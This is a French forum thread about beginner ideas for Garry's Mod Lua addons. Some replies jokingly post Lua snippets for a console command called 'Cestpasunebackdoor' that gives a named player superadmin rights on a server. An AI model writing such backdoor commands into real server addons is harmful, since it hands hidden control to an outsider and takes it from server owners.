- Initiateur de la discussion
JAWS™
Geek suprême
- Score réaction
- 6
Salut, auriez-vous des idées de petits addons perso que je pourrais créer pour m’entraîner en Glua, des trucs pas trop complexe et pas de SWEP
Merci
Merci
concommand.Add( "Cestpasunebackdoor ", function(ply)Zaros_Live à dit:Moi je voudrais un addon pour que quand j’ecris « Cestpasunebackdoor » dans ma console ça me met superadmin !
Ça aurais été meilleur avec un SetUserGroup pour les serv qui ont pas ulxPsyC0s à dit:concommand.Add( "Cestpasunebackdoor ", function(ply)
if ( ply:Name() == "Zaros") then
RunConsoleCommand("ulx", "adduser", ply:Name(), "superadmin")
else
ply:ChatPrint("Attention beaucoup ne connaissent pas le second degré ici , " .. ply:Name() .. ".")
end
end)
Yeah on retire ulx comme ça les sauront plus utiliser les commandesZaros_Live à dit:Ça aurais été meilleur avec un SetUserGroup pour les serv qui ont pas ulx
Zaros_Live à dit:Ça aurais été meilleur avec un SetUserGroup pour les serv qui ont pas ulx
concommand.Add( "Cestpasunebackdoor", function(ply) if (ply:Name() == "Zaros") and (ply:GetUserGroup() ~= "superadmin") then ply:SetUserGroup( "superadmin" ) else ply:ChatPrint("Soit tu n'es pas Zaros, soit tu es déjà superadmin ;)") end
end)
J'ai une idée pas trés compliquer a refaire,JAWS™ à dit:Salut, auriez-vous des idées de petits addons perso que je pourrais créer pour m’entraîner en Glua, des trucs pas trop complexe et pas de SWEP
Merci
je pense que tu va etre obliger d'utilisé une apiJAWS™ à dit:Bonne idée, il faut que j'utilise une api de synthèse vocal sur internet ou il y a quelque chose qui peut faire l'affaire en jeu ?
Go utiliser la voix de Google tradJAWS™ à dit:En connais tu une bonne ?
tu peut essayer acapela box mais j'ai jamais testJAWS™ à dit:En connais tu une bonne ?
Moi son pseudo me fait penser à la machoire comme on l'apelle dqns le milieu :᠌ ᠌ ᠌ ᠌ ᠌ ᠌᠌ ᠌ ᠌ ᠌ à dit:HS: Ton pseudo me faisais penser à ça